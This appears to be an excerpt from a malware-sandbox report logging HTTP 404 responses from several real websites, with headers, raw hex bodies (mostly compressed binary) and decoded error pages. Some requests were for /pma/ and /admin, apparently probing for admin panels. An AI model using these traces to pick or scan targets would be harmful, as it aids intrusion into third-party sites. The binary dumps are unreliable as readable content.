Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 26 Nov 2023 05:59:38 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingLast-Modified: Thu, 12 Sep 2019 15:06:38 GMTETag: W/"3fe-5925c7bf8c9e3"Content-Encoding: gzipData Raw: 32 35 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 65 53 dd 6b db 30 10 7f f7 5f 71 f3 4b 5f f2 b1 8e 6e 0f c3 0b a4 24 a3 81 76 1d 4d c6 28 a5 0c c5 3a c5 a2 b2 e4 49 a7 ba fe ef 7b b2 92 32 ba 17 1b db fa 7d de b9 ba da dd 5c 2f 8a ea 6a bd 5c f1 6d b7 d9 5d af 17 17 1f 2f e0 87 23 f8 ee a2 95 d5 3c bf 2c aa cb e5 76 0d 8d 47 f5 ad 9c a3 f7 ce ff 91 ae 0e f3 72 51 7d 98 4e 1f b4 02 43 08 9b 35 7c 79 5c 54 f3 74 98 3f 3c a0 95 5a 3d 4e a7 4c 3e 3f 8a 5c de ae ee 93 e4 f9 e2 1f 11 7e 2a 76 0d 82 c7 bf 11 03 a1 04 26 8f 2d 5a 82 5e 04 b0 6c 47 25 3b e0 2c 50 a3 03 04 f4 cf e8 67 45 f5 33 71 dd f1 65 b9 5a dd ad b7 db 45 f1 1b f7 b0 1d 3f 83 60 18 4a f4 bd 36 72 26 88 4d bc 9d 62 8f d9 c8 3c 77 50 a4 18 05 00 4c e1 97 55 ce 53 b4 82 d0 0c 13 b8 d1 b5 77 c1 29 82 86 ad 08 29 d9 9d 80 da 20 1b 00 8b 7d 06 95 0a 05 45 8f 25 90 83 8d 25 f4 16 09 d6 2f 9d 71 9e 8d c2 46 b1 71 04 c2 17 02 a7 32 46 58 18 9b 3c 0b d0 62 08 e2 80 c0 d1 4a 72 0e 42 2b 8c 29 27 10 3a ac b5 d2 35 3f 0d 19 64 f8 24 53 31 f6 f3 f9 27 d8 0f 84 61 f2 bf 20 37 c9 6e 6c c8 18 4d 01 5c 7f 54 3b 69 cd e0 de 45 a8 99 28 9d 4c 94 c9 99 9a 64 c8 3e 12 68 62 67 1d 33 d1 00 e4 75 fd c4 37 07 4a f3 1c 42 af a9 6e 18 6d 0c ca 8c 28 d9 b3 a7 9c e8 a4 11 ca 19 ec 12 71 8b c2 b2 4f a7 a0 76 d1 07 3c aa 8c a2 a1 e1 ba df e1 40 78 84 1a 6d e0 f6 24 a7 04 89 4a 44 43 b3 ac b5 d9 6c 41 98 5e 0c e1 14 f4 3d 7e 64 4e 24 c6 d9 43 06 a1 75 f1 d0 a4 08 ad 78 e2 5d 7d 3f 24 9e 6f d7 0d c9 30 66 40 ef fc 93 f0 e3 de f1 5c 8e 45 04 dd 76 06 bf 42 27 e4 38 d1 71 82 f9 fc 69 88 dc 4d c3 2b b2 d7 07 4e db 8e 5b 6c 34 2b 8e 9b cb f2 5d 0c 0d 97 9b 41 2e ad 51 5a 0d a5 9f 11 1a 5e f2 94 58 70 c7 d4 a3 e1 57 e3 88 a1 d5 56 b7 b1 3d e6 bf 7d eb 71 9c 1b 8f 09 5f 44 4d 66 80 3e b5 3d b8 78 c6 d1 3d 0a a9 4f e9 bd 3e 34 c4 7f 52 9f 29 f8 97 7c 05 7e a9 4a 3b fe 03 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 25ceSk0_qK_n$vM(:I{2}\/j\m]/#<,vGrQ}NC5|y\Tt?<Z=NL>?\~*v&-Z^lG%;,PgE3qeZE?`J6r&Mb<wPLUSw)) }E%%/qFq2FX<bJrB+)':5?d$S1'a 7nlM\T;iE(Ld>hbg3u7JBnm(qOv<@xm$JDClA^=~dN$Cux]}?$o0f@\EvB'8qiM+N[l4+]A.QZ^XpWV=}q_DMf>=x=O>4R)|~J;0
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:38 GMTServer: Apache/2.4.58 (Unix)Content-Length: 196Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:38 GMTServer: ApacheUpgrade: h2,h2cConnection: UpgradeAccept-Ranges: bytesVary: Accept-EncodingCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Content-Length: 1699Content-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 65 65 65 3b 0a 7d 0a 0a 62 6f 64 79 2c 20 68 31 2c 20 70 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 53 65 67 6f 65 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 22 4c 75 63 69 64 61 20 47 72 61 6e 64 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 37 37 70 78 3b 0a 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 31 37 30 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 31 35 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 7d 0a 0a 2e 72 6f 77 3a 62 65 66 6f 72 65 2c 20 2e 72 6f 77 3a 61 66 74 65 72 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 74 61 62 6c 65 3b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 20 22 3b 0a 7d 0a 0a 2e 63 6f 6c 2d 6d 64 2d 36 20 7b 0a 20 20 77 69 64 74 68 3a 20 35 30 25 3b 0a 7d 0a 0a 2e 63 6f 6c 2d 6d 64 2d 70 75 73 68 2d 33 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 32 35 25 3b 0a 7d 0a 0a 68 31 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 38 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 32 30 70 78 20 30 3b 0a 7d 0a 0a 2e 6c 65 61 64 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 31 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 32 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 7d 0a 0a 70 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 30 70 78 3b 0a 7d 0a 0a 61 20 7b 0
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:38 GMTServer: ApacheX-Powered-By: PleskLinVary: User-AgentTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 30 0d 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 10File not found.0
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:38 GMTServer: ApacheUpgrade: h2,h2cConnection: UpgradeAccept-Ranges: bytesVary: Accept-EncodingCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Content-Length: 1699Content-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 65 65 65 3b 0a 7d 0a 0a 62 6f 64 79 2c 20 68 31 2c 20 70 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 53 65 67 6f 65 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 22 4c 75 63 69 64 61 20 47 72 61 6e 64 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 37 37 70 78 3b 0a 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 31 37 30 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 31 35 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 7d 0a 0a 2e 72 6f 77 3a 62 65 66 6f 72 65 2c 20 2e 72 6f 77 3a 61 66 74 65 72 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 74 61 62 6c 65 3b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 20 22 3b 0a 7d 0a 0a 2e 63 6f 6c 2d 6d 64 2d 36 20 7b 0a 20 20 77 69 64 74 68 3a 20 35 30 25 3b 0a 7d 0a 0a 2e 63 6f 6c 2d 6d 64 2d 70 75 73 68 2d 33 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 32 35 25 3b 0a 7d 0a 0a 68 31 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 38 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 32 30 70 78 20 30 3b 0a 7d 0a 0a 2e 6c 65 61 64 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 31 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 32 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 7d 0a 0a 70 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 30 70 78 3b 0a 7d 0a 0a 61 20 7b 0
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:38 GMTServer: Apache/2.4.58 (Unix)Content-Length: 196Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100x-powered-by: PHP/7.4.33content-type: text/html; charset=UTF-8expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <http://hmichaelandco.com/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Sun, 26 Nov 2023 05:59:38 GMTserver: LiteSpeedData Raw: 32 66 39 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d 6b 73 e3 36 b2 e8 67 b9 ea fc 07 0c 9d 58 d2 2c 49 51 2f 3f 64 cb 39 93 d9 64 93 53 c9 66 6e 66 72 b6 6e 4d e6 a8 20 12 92 30 43 11 5c 02 92 ed f5 f8 07 dd bf 71 7f d9 ad c6 83 04 29 ea 61 8f 93 73 3e 5c a5 32 26 41 a0 bb d1 68 34 1a 40 37 70 f5 22 62 a1 b8 4b 09 5a 88 65 7c 7d 74 05 7f 50 8c 93 f9 d8 21 89 f7 db 5b e7 a8 91 66 64 46 6f c7 0e 9b 8f d0 42 88 94 8f 3a 1d 36 4f fd 25 e9 24 fc d8 41 50 8a e0 e8 fa e8 6a 49 04 96 59 3c f2 cf 15 5d 8f 9d d7 2c 11 24 11 de bb bb 94 38 28 54 6f 63 47 90 5b d1 01 4c 97 28 5c e0 8c 13 31 fe ed dd f7 de b9 83 3a d7 47 47 57 2f 3c 0f fd cc a6 34 26 e8 6d 4a 42 3a a3 21 fa 99 08 cc d1 09 fa 1e af 69 c8 12 8e 3c cf 20 4c f0 92 8c 9d 35 25 37 29 cb 84 85 e6 86 46 62 31 8e c8 9a 86 c4 93 2f 2e a2 09 15 14 c7 1e 0f 71 4c c6 5d 17 2d f1 2d 5d ae 96 45 c2 8a 93 4c be e1 69 4c c6 81 73 7d 15 d3 e4 13 ca 48 3c 76 f8 82 65 22 5c 09 04 34 38 68 91 91 d9 d8 01 9e 8c 3a 9d c5 92 86 0b 4c 62 9c 44 21 f3 43 b6 ec dc a4 9e ae 72 67 95 c6 0c 47 bc d3 0b 7a 41 27 38 cd 33 fb 69 32 2f 61 c0 69 1a 13 4f b0 55 b8 f0 fe 44 24 9c fe 8b f0 b1 d3 ed 05 b7 dd 5e f0 27 d5 4c 23 3d 3b bd 3d 3b fd 73 51 76 87 bd db ee b0 f7 8c 48 41 66 ff c1 b2 e8 4d 46 38 47 6f c5 6a 36 93 22 8a b6 fc ae 78 98 d1 54 5c 1f 6d f9 2e 93 3b 2f d1 ff 66 2b 14 e2 04 e1 28 42 4b 96 11 e8 44 33 3a 5f 65 58 50 96 20 96 c2 1f 8e 04 43 37 64 3a 63 89 00 39 23 19 9a de a1 34 23 6b ca 56 3c be 43 11 99 d1 84 26 73 24 16 04 fd 83 4c bf 67 89 78 2d 01 a1 1b 2a 16 e8 8e ad b2 1c d6 cb ce 4e a2 e8 0c b5 10 a8 0c 36 ab 80 1a 8f c7 c8 59 25 12 19 89 1c d4 46 f7 3b 21 41 1d cb c4 8c 51 42 6e d0 2f d3 8f 24 14 ad f6 e5 ce d2 0f 3b bf 96 e0 be 6f ce 19 9b c7 a4 f9 01 8d d1 fd 0c 2f 69 4c 09 1f a1 f7 cd 9f 59 22 38 c9 32 2c 46 dd 20 70 7b 41 e0 f6 83 c0 1d 04 81 3b 0c 02 f7 34 08 dc b3 20 70 cf 83 c0 bd 08 02 b7 1b 04 54 e0 98 86 90 53 3f f5 f3 a7 41 fe 34 cc 9f 4e f3 a7 b3 fc e9 3c 7f ba 30 4f 4d 17 35 7f 49 49 f2 97 b7 38 e1 23 43 82 8d be 0e cd 4e e0 27 7c 35 05 cd 1a 63 41 93 e6 87 87 cb a3 9d 0c 6b cd 56 49 08 c2 d4 3a a4 d9 d6 38 43 37 33 34 46 11 0b 57 4b 92 08 3f cc 08 16 e4 bb 98 c0 5b 0b 35 95 7c 37 d1 9e 56 04 19 b8 99 f9 3c 0b d1 18 35 cd f0 82 3f e2 5b 5f b5 19 4e 29 97 da 14 d2 3a 31 9d f2 8e 96 f4 4e d7 1f fa 7d f3 e6 7f e4 cd dd 02 a3 51 c9 d1 6e 8c 9a 72 10 fa 88 d7 58 53 7a 50 61 cc ef 12 49 a9 c8 56 e4 00 7c c0 27 6e b3 69 4e 84 e6 11 ff f6 ee 1d 9e ff 1d 2f 89 cd ad f7 c1 87 fd 84 70 3f c5 19 49 c4 df 59 44 7c 9a 70 92 89 6f c9 8c 65 a4 85 6e 66 Data Ascii: 2f
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:38 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/5.4.16Content-Length: 202Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 70 6d 61 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /pma/ was not found on this server.</p></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:38 GMTServer: ApacheVary: accept-language,accept-charsetAccept-Ranges: bytesConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=iso-8859-1Content-Language: enData Raw: 31 65 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 0d 0a 61 66 0d 0a 49 53 4f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 33 0d 0a 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 0d 0a 33 38 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 35 0d 0a 77 65 62 6d 61 73 74 65 72 40 66 69 6e 61 6e 63 65 66 61 73 74 2e 63 6f 6d 2e 62 72 22 20 2f 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 0a 20 20 20 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0a 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 43 43 3b 20 7d 0a 20 20 20 20 70 2c 20 61 64 64 72 65 73 73 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 0a 20 20 20 20 73 70 61 6e 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 0a 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 0d 0a 31 62 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 68 31 3e 0a 3c 70 3e 0a 0d 0a 33 39 0d 0a 0a 0a 20 20 20 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 0a 20 20 0d 0a 35 37 0d 0a 0a 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 0a 0a 20 20 0d 0a 32 0d 0a 0a 0a 0d 0a 39 0d 0a 3c 2f 70 3e 0a 3c 70 3e 0a 0d 0a 34 38 0d 0a 49 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 0a 74 68 65 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 32 64 0d 0a 77 65 62 6d 61 73 74 65 72 40 66 69 6e 61
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:38 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/5.4.16Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 61 64 6d 69 6e 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /admin was not found on this server.</p></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:37 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://lumaruniformes.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 13939Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 d5 b2 db 76 e3 c6 96 25 fa 9c fa 0a 24 7c 9c 12 bd 89 1b 6f 92 28 51 1e de be d4 71 1f df da 69 d7 ae 3e 96 07 47 00 58 00 22 15 88 80 23 02 a4 98 da fa 97 d3 8f f5 d0 0f 3d ea 0f da 3f 76 16 2e 24 41 12 90 94 99 ca 5d bb 7c 11 03 eb 32 d7 5c 73 cd cb 97 a1 08 f4 2a 03 23 d1 29 bb 3a ba 2c 7e 0c 46 78 3c 33 41 59 df ff 9b 59 c4 80 84 57 47 2f 2e 53 d0 c4 08 12 22 15 e8 99 f9 eb 2f df 58 67 e6 26 ce 49 0a 33 73 41 61 99 09 a9 4d 23 10 5c 03 c7 ba 25 0d 75 32 0b 61 41 03 b0 ca 8f be 41 39 d5 94 30 4b 05 84 c1 cc 2b 51 18 e5 37 86 04 36 33 33 29 22 ca c0 34 12 09 d1 cc 4c b4 ce d4 d4 71 e2 34 8b 6d 21 63 e7 36 e2 8e 57 35 69 aa 19 5c fd 20 0c 05 06 f0 62 a6 fc f3 3f 90 bf 91 fd f9 3f 